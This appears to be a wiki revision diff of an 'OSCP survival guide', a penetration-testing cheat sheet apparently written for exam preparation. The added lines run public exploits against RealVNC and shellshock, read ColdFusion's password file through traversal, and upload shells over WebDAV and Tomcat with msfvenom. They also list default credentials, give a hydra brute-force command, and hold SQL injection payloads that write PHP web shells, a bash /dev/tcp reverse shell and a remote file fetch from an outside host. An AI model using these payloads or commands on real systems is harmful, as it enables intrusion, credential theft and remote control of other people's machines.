Outils d'utilisateurs

Outils du Site



Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

oscp_survival_guide [2020/11/25 14:16]
oscp_survival_guide [2020/11/25 14:39] (Version actuelle)
Ligne 2754: Ligne 2754:
 https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
 +RealVNC : https://www.exploit-db.com/exploits/36932
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444
 +root@kali:~/PWK$python RealVNC-exploit-36932.py
 +[] Please input an IP address to pwn:
 +[] Hello From Server: RFB 003.008
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del
 +XAMPP cred(wampp/xampp)
 +ColdFusion (Vulnerable)
 +Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
 +LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 +(either – neo-security.xml and password.properties)
 +ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 +exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln
 +auxiliary : webdav_test
 +1 cadaver http://10.11.x.x/webdav/
 +Uploading shells.txt to `shells.txt’
 +1 dav:> put shells.txt
 +2 dav:> copy shells.txt shells.asp;.txt
 +db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 +You can also bruteforce by sh hydra -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg.
 +You can upload reverse shell on manager consor ; msfvenom jsp or war file
 +msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war
 +jar -xvf shell.war
 +Windows IIS 
 +Getting Windows 0S and version details through Nikto / Nmap Scanning.
 +nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 -p 3306
 +MySQL login : sh mysql -h -D wordpress -u root -p plbkac
 +MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/ 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'
 +' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
 +' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 +root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost= lhost= lport=1234
 +[!] Started reverse shell handler
 +[-] Trying exploit on : /cgi-bin/status"
 +proxy scanner/http/squid_pivot_scanning
 +RHOST : Target
 +RANGE : Target
 +RPORT : Squid port
 +msf auxiliary(scanner/http/squid_pivot_scanning) > run
 +[+] [] is alive but 21 is CLOSED
 +[+] [] seems OPEN
 +if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 +nikto -h -useproxy"
 +RFI(Remote File Inclusion) 
 +Uploading malicious .php file on database 
 </code> </code>
oscp_survival_guide.txt · Dernière modification: 2020/11/25 14:39 par M0N5T3R